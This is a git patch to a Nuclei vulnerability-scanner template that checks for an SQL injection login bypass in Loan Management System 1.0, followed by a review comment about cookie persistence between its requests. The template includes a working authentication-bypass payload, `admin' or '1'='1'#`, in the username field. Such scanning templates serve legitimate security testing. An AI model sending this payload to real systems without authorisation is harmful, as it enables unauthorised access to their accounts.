From 8bca76cf6dcc7216c01593eea44620d9991134db Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Jul 2022 18:08:25 +0530
Subject: [PATCH] Update loancms-sqli.yaml
---
 vulnerabilities/other/loancms-sqli.yaml | 26 +++++++++++++++-----------
 1 file changed, 15 insertions(+), 11 deletions(-)
diff --git a/vulnerabilities/other/loancms-sqli.yaml b/vulnerabilities/other/loancms-sqli.yaml
index 0805ecf22e..df5abaddac 100644
--- a/vulnerabilities/other/loancms-sqli.yaml
+++ b/vulnerabilities/other/loancms-sqli.yaml
@@ -3,12 +3,12 @@ id: loancms-sqli
 info:
 name: Loan Management System 1.0 - SQLi Authentication Bypass
 author: arafatansari
- severity: medium
- reference:
- https://www.exploit-db.com/exploits/50402
+ severity: high
 description: |
 Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
- tags: sqli,bypass,cms
+ reference:
+ - https://www.exploit-db.com/exploits/50402
+ tags: loancms,sqli,bypass,cms
 requests:
 - raw:
@@ -19,18 +19,22 @@ requests:
 username=admin'+or+'1'%3D'1'%23&password=nuclei
+ - |
+ GET /index.php?page=home HTTP/1.1
+ Host: {{Hostname}}
+
 matchers-condition: and
 matchers:
 - type: word
 part: body
 words:
- - '1'
+ - 'window.start_load'
+ - 'Welcome back'
+ - 'Loan Management System'
+ condition: and
 - type: word
- part: header
+ part: body
 words:
- - text/html
-
- - type: status
- status:
- - 200
+ - 'login-form'
+ negative: true
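Review bot: The added `GET /index.php?page=home` request can only return the post-login page if it carries the session cookie issued by the login POST, and nothing in the second hunk turns on cookie persistence between the two raw requests. Unless it is already set outside the hunk, add `cookie-reuse: true` beside `matchers-condition: and`; without it the GET presumably lands on the login page, the negative `login-form` matcher fails, and a vulnerable host is reported clean. The three body words are also tied to this application's exact page text, so a short comment stating that they are expected in the second response would help the next maintainer. The `requests` block starts above the hunk, so the first request's headers are not visible here.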